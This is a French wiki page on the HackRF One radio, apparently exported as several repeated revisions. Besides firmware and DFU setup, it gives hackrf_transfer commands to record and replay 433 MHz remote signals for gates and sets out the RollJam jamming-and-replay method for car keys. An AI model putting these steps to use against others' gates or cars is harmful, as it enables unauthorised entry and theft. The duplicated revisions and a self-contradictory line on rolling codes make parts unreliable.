Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

=== Attaque sur Drone (DJI Mavic Mini) ===

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T10:51:02Z

OldNeib : /* Car Key Replay Attack */

== HackRF One ==
Le HackRF One de Great Scott Gadgets est une radio définie par logiciel capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération, HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
=== Jamming Car Key ===

=== RollJam Attack ===

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

=== Attaque sur Drone (DJI Mavic Mini) ===

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T10:49:33Z

OldNeib : /* Car Key Replay Attack */

== HackRF One ==
Le HackRF One de Great Scott Gadgets est une radio définie par logiciel capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération, HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

== Radio Jamming ==
=== Jamming Car Key ===

=== RollJam Attack ===

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

=== Attaque sur Drone (DJI Mavic Mini) ===

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T10:46:16Z

OldNeib : /* Options */

== HackRF One ==
Le HackRF One de Great Scott Gadgets est une radio définie par logiciel capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération, HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==

== Radio Jamming ==
=== Jamming Car Key ===

=== RollJam Attack ===

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

=== Attaque sur Drone (DJI Mavic Mini) ===

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French